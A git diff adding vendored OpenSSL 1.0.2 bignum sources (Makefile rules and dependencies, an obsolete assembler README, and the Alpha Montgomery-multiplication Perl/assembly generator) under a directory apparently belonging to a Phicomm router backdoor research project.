+bn-ppc.s:	asm/ppc.pl;	$(PERL) asm/ppc.pl $(PERLASM_SCHEME) $@
+ppc-mont.s:	asm/ppc-mont.pl;$(PERL) asm/ppc-mont.pl $(PERLASM_SCHEME) $@
+ppc64-mont.s:	asm/ppc64-mont.pl;$(PERL) asm/ppc64-mont.pl $(PERLASM_SCHEME) $@
+
+alpha-mont.s:	asm/alpha-mont.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) asm/alpha-mont.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+
+# GNU make "catch all"
+%-mont.S:	asm/%-mont.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+%-gf2m.S:	asm/%-gf2m.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+armv4-mont.o:	armv4-mont.S
+armv4-gf2m.o:	armv4-gf2m.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+exptest:
+	rm -f exptest
+	gcc -I../../include -g2 -ggdb -o exptest exptest.c ../../libcrypto.a
+
+div:
+	rm -f a.out
+	gcc -I.. -g div.c ../../libcrypto.a
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bn_add.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_add.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_add.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_add.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_add.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_add.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_add.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_add.c bn_lcl.h
+bn_asm.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_asm.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_asm.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_asm.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_asm.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_asm.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_asm.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_asm.c bn_lcl.h
+bn_blind.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_blind.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_blind.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_blind.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_blind.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_blind.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_blind.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_blind.c bn_lcl.h
+bn_const.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bn_const.o: ../../include/openssl/opensslconf.h
+bn_const.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_const.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_const.o: ../../include/openssl/symhacks.h bn.h bn_const.c
+bn_ctx.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_ctx.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_ctx.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_ctx.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_ctx.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_ctx.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_ctx.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_ctx.c bn_lcl.h
+bn_depr.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_depr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_depr.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_depr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_depr.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bn_depr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_depr.o: ../cryptlib.h bn_depr.c bn_lcl.h
+bn_div.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_div.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_div.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_div.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_div.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_div.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_div.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_div.c bn_lcl.h
+bn_err.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bn_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+bn_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bn_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+bn_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_err.o: bn_err.c
+bn_exp.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_exp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_exp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_exp.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_exp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_exp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_exp.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_exp.c bn_lcl.h
+bn_exp2.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_exp2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_exp2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_exp2.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_exp2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_exp2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_exp2.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_exp2.c bn_lcl.h
+bn_gcd.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_gcd.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_gcd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_gcd.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_gcd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_gcd.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_gcd.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_gcd.c bn_lcl.h
+bn_gf2m.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_gf2m.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_gf2m.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_gf2m.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_gf2m.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_gf2m.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_gf2m.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_gf2m.c bn_lcl.h
+bn_kron.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_kron.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_kron.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_kron.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_kron.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_kron.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_kron.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_kron.c bn_lcl.h
+bn_lib.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_lib.c
+bn_mod.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mod.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mod.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mod.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mod.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mod.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mod.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mod.c
+bn_mont.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mont.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mont.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mont.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mont.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mont.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mont.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mont.c
+bn_mpi.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mpi.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mpi.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mpi.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mpi.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mpi.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mpi.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mpi.c
+bn_mul.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_mul.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_mul.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_mul.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_mul.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_mul.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_mul.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_mul.c
+bn_nist.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_nist.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_nist.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_nist.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_nist.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_nist.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_nist.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_nist.c
+bn_prime.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_prime.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_prime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_prime.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_prime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_prime.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bn_prime.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_prime.o: ../cryptlib.h bn_lcl.h bn_prime.c bn_prime.h
+bn_print.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_print.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_print.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_print.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_print.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_print.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_print.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_print.c
+bn_rand.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_rand.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_rand.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_rand.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_rand.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_rand.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bn_rand.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bn_rand.o: ../cryptlib.h bn_lcl.h bn_rand.c
+bn_recp.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_recp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_recp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_recp.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_recp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_recp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_recp.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_recp.c
+bn_shift.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_shift.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_shift.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_shift.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_shift.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_shift.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_shift.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_shift.c
+bn_sqr.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_sqr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_sqr.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_sqr.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_sqr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_sqr.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_sqr.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_sqr.c
+bn_sqrt.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_sqrt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_sqrt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_sqrt.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_sqrt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_sqrt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_sqrt.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_sqrt.c
+bn_word.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+bn_word.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bn_word.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bn_word.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bn_word.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_word.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_word.o: ../../include/openssl/symhacks.h ../cryptlib.h bn_lcl.h bn_word.c
+bn_x931p.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+bn_x931p.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+bn_x931p.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bn_x931p.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bn_x931p.o: ../../include/openssl/symhacks.h bn_x931p.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/README
new file mode 100644
index 0000000..b0f3a68
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/README
@@ -0,0 +1,27 @@
+<OBSOLETE>
+
+All assember in this directory are just version of the file
+crypto/bn/bn_asm.c.
+
+Quite a few of these files are just the assember output from gcc since on 
+quite a few machines they are 2 times faster than the system compiler.
+
+For the x86, I have hand written assember because of the bad job all
+compilers seem to do on it.  This normally gives a 2 time speed up in the RSA
+routines.
+
+For the DEC alpha, I also hand wrote the assember (except the division which
+is just the output from the C compiler pasted on the end of the file).
+On the 2 alpha C compilers I had access to, it was not possible to do
+64b x 64b -> 128b calculations (both long and the long long data types
+were 64 bits).  So the hand assember gives access to the 128 bit result and
+a 2 times speedup :-).
+
+There are 3 versions of assember for the HP PA-RISC.
+
+pa-risc.s is the origional one which works fine and generated using gcc :-)
+
+pa-risc2W.s and pa-risc2.s are 64 and 32-bit PA-RISC 2.0 implementations
+by Chris Ruemmler from HP (with some help from the HP C compiler).
+
+</OBSOLETE>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/alpha-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/alpha-mont.pl
new file mode 100644
index 0000000..03596e2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/alpha-mont.pl
@@ -0,0 +1,321 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# On 21264 RSA sign performance improves by 70/35/20/15 percent for
+# 512/1024/2048/4096 bit key lengths. This is against vendor compiler
+# instructed to '-tune host' code with in-line assembler. Other
+# benchmarks improve by 15-20%. To anchor it to something else, the
+# code provides approximately the same performance per GHz as AMD64.
+# I.e. if you compare 1GHz 21264 and 2GHz Opteron, you'll observe ~2x
+# difference.
+
+# int bn_mul_mont(
+$rp="a0";	# BN_ULONG *rp,
+$ap="a1";	# const BN_ULONG *ap,
+$bp="a2";	# const BN_ULONG *bp,
+$np="a3";	# const BN_ULONG *np,
+$n0="a4";	# const BN_ULONG *n0,
+$num="a5";	# int num);
+
+$lo0="t0";
+$hi0="t1";
+$lo1="t2";
+$hi1="t3";
+$aj="t4";
+$bi="t5";
+$nj="t6";
+$tp="t7";
+$alo="t8";
+$ahi="t9";
+$nlo="t10";
+$nhi="t11";
+$tj="t12";
+$i="s3";
+$j="s4";
+$m1="s5";
+
+$code=<<___;
+#ifdef __linux__
+#include <asm/regdef.h>
+#else
+#include <asm.h>
+#include <regdef.h>
+#endif
+
+.text
+
+.set	noat
+.set	noreorder
+
+.globl	bn_mul_mont
+.align	5
+.ent	bn_mul_mont
+bn_mul_mont:
+	lda	sp,-48(sp)
+	stq	ra,0(sp)
+	stq	s3,8(sp)
+	stq	s4,16(sp)
+	stq	s5,24(sp)
+	stq	fp,32(sp)
+	mov	sp,fp
+	.mask	0x0400f000,-48
+	.frame	fp,48,ra
+	.prologue 0
+
+	.align	4
+	.set	reorder
+	sextl	$num,$num
+	mov	0,v0
+	cmplt	$num,4,AT
+	bne	AT,.Lexit
+
+	ldq	$hi0,0($ap)	# ap[0]
+	s8addq	$num,16,AT
+	ldq	$aj,8($ap)
+	subq	sp,AT,sp
+	ldq	$bi,0($bp)	# bp[0]
+	lda	AT,-4096(zero)	# mov	-4096,AT
+	ldq	$n0,0($n0)
+	and	sp,AT,sp
+
+	mulq	$hi0,$bi,$lo0
+	ldq	$hi1,0($np)	# np[0]
+	umulh	$hi0,$bi,$hi0
+	ldq	$nj,8($np)
+
+	mulq	$lo0,$n0,$m1
+
+	mulq	$hi1,$m1,$lo1
+	umulh	$hi1,$m1,$hi1
+
+	addq	$lo1,$lo0,$lo1
+	cmpult	$lo1,$lo0,AT
+	addq	$hi1,AT,$hi1
+
+	mulq	$aj,$bi,$alo
+	mov	2,$j
+	umulh	$aj,$bi,$ahi
+	mov	sp,$tp
+
+	mulq	$nj,$m1,$nlo
+	s8addq	$j,$ap,$aj
+	umulh	$nj,$m1,$nhi
+	s8addq	$j,$np,$nj
+.align	4
+.L1st:
+	.set	noreorder
+	ldq	$aj,0($aj)
+	addl	$j,1,$j
+	ldq	$nj,0($nj)
+	lda	$tp,8($tp)
+
+	addq	$alo,$hi0,$lo0
+	mulq	$aj,$bi,$alo
+	cmpult	$lo0,$hi0,AT
+	addq	$nlo,$hi1,$lo1
+
+	mulq	$nj,$m1,$nlo
+	addq	$ahi,AT,$hi0
+	cmpult	$lo1,$hi1,v0
+	cmplt	$j,$num,$tj
+
+	umulh	$aj,$bi,$ahi
+	addq	$nhi,v0,$hi1
+	addq	$lo1,$lo0,$lo1
+	s8addq	$j,$ap,$aj
+
+	umulh	$nj,$m1,$nhi
+	cmpult	$lo1,$lo0,v0
+	addq	$hi1,v0,$hi1
+	s8addq	$j,$np,$nj
+
+	stq	$lo1,-8($tp)
+	nop
+	unop
+	bne	$tj,.L1st
+	.set	reorder
+
+	addq	$alo,$hi0,$lo0
+	addq	$nlo,$hi1,$lo1
+	cmpult	$lo0,$hi0,AT
+	cmpult	$lo1,$hi1,v0
+	addq	$ahi,AT,$hi0
+	addq	$nhi,v0,$hi1
+
+	addq	$lo1,$lo0,$lo1
+	cmpult	$lo1,$lo0,v0
+	addq	$hi1,v0,$hi1
+
+	stq	$lo1,0($tp)
+
+	addq	$hi1,$hi0,$hi1
+	cmpult	$hi1,$hi0,AT
+	stq	$hi1,8($tp)
+	stq	AT,16($tp)
+
+	mov	1,$i
+.align	4
+.Louter:
+	s8addq	$i,$bp,$bi
+	ldq	$hi0,0($ap)
+	ldq	$aj,8($ap)
+	ldq	$bi,0($bi)
+	ldq	$hi1,0($np)
+	ldq	$nj,8($np)
+	ldq	$tj,0(sp)
+
+	mulq	$hi0,$bi,$lo0
+	umulh	$hi0,$bi,$hi0
+
+	addq	$lo0,$tj,$lo0
+	cmpult	$lo0,$tj,AT
+	addq	$hi0,AT,$hi0
+
+	mulq	$lo0,$n0,$m1
+
+	mulq	$hi1,$m1,$lo1
+	umulh	$hi1,$m1,$hi1
+
+	addq	$lo1,$lo0,$lo1
+	cmpult	$lo1,$lo0,AT
+	mov	2,$j
+	addq	$hi1,AT,$hi1
+
+	mulq	$aj,$bi,$alo
+	mov	sp,$tp
+	umulh	$aj,$bi,$ahi
+
+	mulq	$nj,$m1,$nlo
+	s8addq	$j,$ap,$aj
+	umulh	$nj,$m1,$nhi
+.align	4
+.Linner:
+	.set	noreorder
+	ldq	$tj,8($tp)	#L0
+	nop			#U1
+	ldq	$aj,0($aj)	#L1
+	s8addq	$j,$np,$nj	#U0
+
+	ldq	$nj,0($nj)	#L0
+	nop			#U1
+	addq	$alo,$hi0,$lo0	#L1
+	lda	$tp,8($tp)
+
+	mulq	$aj,$bi,$alo	#U1
+	cmpult	$lo0,$hi0,AT	#L0
+	addq	$nlo,$hi1,$lo1	#L1
+	addl	$j,1,$j
+
+	mulq	$nj,$m1,$nlo	#U1
+	addq	$ahi,AT,$hi0	#L0
+	addq	$lo0,$tj,$lo0	#L1
+	cmpult	$lo1,$hi1,v0	#U0
+
+	umulh	$aj,$bi,$ahi	#U1
+	cmpult	$lo0,$tj,AT	#L0
+	addq	$lo1,$lo0,$lo1	#L1
+	addq	$nhi,v0,$hi1	#U0
+
+	umulh	$nj,$m1,$nhi	#U1
+	s8addq	$j,$ap,$aj	#L0
+	cmpult	$lo1,$lo0,v0	#L1
+	cmplt	$j,$num,$tj	#U0	# borrow $tj
+
+	addq	$hi0,AT,$hi0	#L0
+	addq	$hi1,v0,$hi1	#U1
+	stq	$lo1,-8($tp)	#L1
+	bne	$tj,.Linner	#U0
+	.set	reorder
+
+	ldq	$tj,8($tp)
+	addq	$alo,$hi0,$lo0
+	addq	$nlo,$hi1,$lo1
+	cmpult	$lo0,$hi0,AT
+	cmpult	$lo1,$hi1,v0
+	addq	$ahi,AT,$hi0
+	addq	$nhi,v0,$hi1
+
+	addq	$lo0,$tj,$lo0
+	cmpult	$lo0,$tj,AT
+	addq	$hi0,AT,$hi0
+
+	ldq	$tj,16($tp)
+	addq	$lo1,$lo0,$j
+	cmpult	$j,$lo0,v0
+	addq	$hi1,v0,$hi1
+
+	addq	$hi1,$hi0,$lo1
+	stq	$j,0($tp)
+	cmpult	$lo1,$hi0,$hi1
+	addq	$lo1,$tj,$lo1
+	cmpult	$lo1,$tj,AT
+	addl	$i,1,$i
+	addq	$hi1,AT,$hi1
+	stq	$lo1,8($tp)
+	cmplt	$i,$num,$tj	# borrow $tj
+	stq	$hi1,16($tp)
+	bne	$tj,.Louter
+
+	s8addq	$num,sp,$tj	# &tp[num]
+	mov	$rp,$bp		# put rp aside
+	mov	sp,$tp
+	mov	sp,$ap
+	mov	0,$hi0		# clear borrow bit
+
+.align	4
+.Lsub:	ldq	$lo0,0($tp)
+	ldq	$lo1,0($np)
+	lda	$tp,8($tp)
+	lda	$np,8($np)
+	subq	$lo0,$lo1,$lo1	# tp[i]-np[i]
+	cmpult	$lo0,$lo1,AT
+	subq	$lo1,$hi0,$lo0
+	cmpult	$lo1,$lo0,$hi0
+	or	$hi0,AT,$hi0
+	stq	$lo0,0($rp)
+	cmpult	$tp,$tj,v0
+	lda	$rp,8($rp)
+	bne	v0,.Lsub
+
+	subq	$hi1,$hi0,$hi0	# handle upmost overflow bit
+	mov	sp,$tp
+	mov	$bp,$rp		# restore rp
+
+	and	sp,$hi0,$ap
+	bic	$bp,$hi0,$bp
+	bis	$bp,$ap,$ap	# ap=borrow?tp:rp
+
+.align	4
+.Lcopy:	ldq	$aj,0($ap)	# copy or in-place refresh
+	lda	$tp,8($tp)
+	lda	$rp,8($rp)
+	lda	$ap,8($ap)
+	stq	zero,-8($tp)	# zap tp
+	cmpult	$tp,$tj,AT
+	stq	$aj,-8($rp)
+	bne	AT,.Lcopy
+	mov	1,v0
+
+.Lexit:
+	.set	noreorder
+	mov	fp,sp
+	/*ldq	ra,0(sp)*/
+	ldq	s3,8(sp)
+	ldq	s4,16(sp)
+	ldq	s5,24(sp)
+	ldq	fp,32(sp)
+	lda	sp,48(sp)
+	ret	(ra)
+.end	bn_mul_mont
+.ascii	"Montgomery Multiplication for Alpha, CRYPTOGAMS by <appro\@openssl.org>"
+.align	2
+___
+
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/armv4-gf2m.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/armv4-gf2m.pl
new file mode 100644
index 0000000..8f529c9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/armv4-gf2m.pl
@@ -0,0 +1,289 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# May 2011
+#
+# The module implements bn_GF2m_mul_2x2 polynomial multiplication
